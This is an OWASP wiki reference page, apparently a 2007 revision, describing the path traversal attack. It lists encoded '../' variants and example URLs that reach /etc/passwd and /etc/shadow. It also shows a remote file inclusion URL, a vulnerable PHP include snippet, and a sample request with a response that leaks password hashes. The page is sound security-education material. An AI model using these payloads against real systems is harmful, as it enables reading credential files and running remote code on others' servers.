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Path Traversal

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Revision as of 12:12, 8 August 2007 by Nsrav (talk | contribs) (Categories)

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This is an Attack. To view all attacks, please see the Attack Category page.


Description

This attack aims to access files and directories that are stored outside web root folder. By browsing the application, one should look for absolute links to files stored on the web server and how this is done. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations it’s possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control. The idea is to use “../” sequences to move up to root directory, thus permitting to navigate thru file system.

This attack can be execute with a external malicious code injected on the path, the way of the Resource Injection attack, but it’s a Path Traversal attack

This attack is also named of “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.

To perform this attack it’s not necessary to use a specific tool, but it’s recommended to use a spider/crawler to detect all URLs available.


Request variations

Encoding and double encoding:

%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../ 
%2e%2e%5c represents ..\
%2e%2e\ represents ..\ 
..%5c represents ..\ 
%252e%252e%255c represents ..\ 
..%255c represents ..\ and so on. 

Unicode/UTF-8 Encoding (only for systems support UTF-8 sequences)

..%c0%af represents ../ 
..%c1%9c represents ..\ 


OS specific

UNIX
Root directory:  “ / “ 
Directory separator: “ / “
WINDOWS
Root directory: “  <partition letter> : \ “
Directory separator: “ / “ or “ \ ” 


Examples

Example 1

In order to identify the possibility to execute this attack, it’s needed to observe how the application deals with the resources in use. The following examples show some situations.

 http://some_site.com.br/get-files.jsp?file=report.pdf  
 http://some_site.com.br/get-page.php?home=aaa.html  
 http://some_site.com.br/some-page.asp?page=index.html  


In these examples it’s possible to insert a malicious string as the variable parameter to access files located outside the web publish directory. Ex:

  http://some_site.com.br/get-files?file=../../../../some dir/some file 

Or

  http://some_site.com.br/../../../../some dir/some file 

The following URLs show examples of *NIX password file exploitation:

http://some_site.com.br/../../../../etc/shadow  
http://some_site.com.br/get-files?file=/etc/passwd 


Note: In a windows system an attacker can navigate only in a partition that locates web root while in the Linux he can navigate in all disc.


Example 2

It's also possible to include files, and scripts, located on external website,

 http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php   


Example 3

These examples illustrate a case when an attacker make the server show the CGI source code;

 http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi   


Example 4

This example was extracted from: Wikipedia - Directory Traversal

A typical example of vulnerable application code is:

<?php
$template = 'blue.php';
if ( is_set( $_COOKIE['TEMPLATE'] ) )
   $template = $_COOKIE['TEMPLATE'];
include ( "/home/users/phpguru/templates/" . $template );
?>


An attack against this system could be to send the following HTTP request:

GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd


Generating a server response such as:

HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh 
daemon:*:1:1::/tmp: 
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh


The repeated ../ characters after /home/users/phpguru/templates/ has caused include() to traverse to the root directory, and then include the UNIX password file /etc/passwd.


UNIX etc/passwd is a common file used to demonstrate directory traversal, as it is often used by crackers to try cracking the passwords.


References


Related Threats

This article is a stub. You can help OWASP by expanding it or discussing it on its Talk page. Category: Information Disclosure


Related Attacks


Related Vulnerabilities

Category:Input Validation Vulnerability


Related Countermeasures

Category:Input Validation


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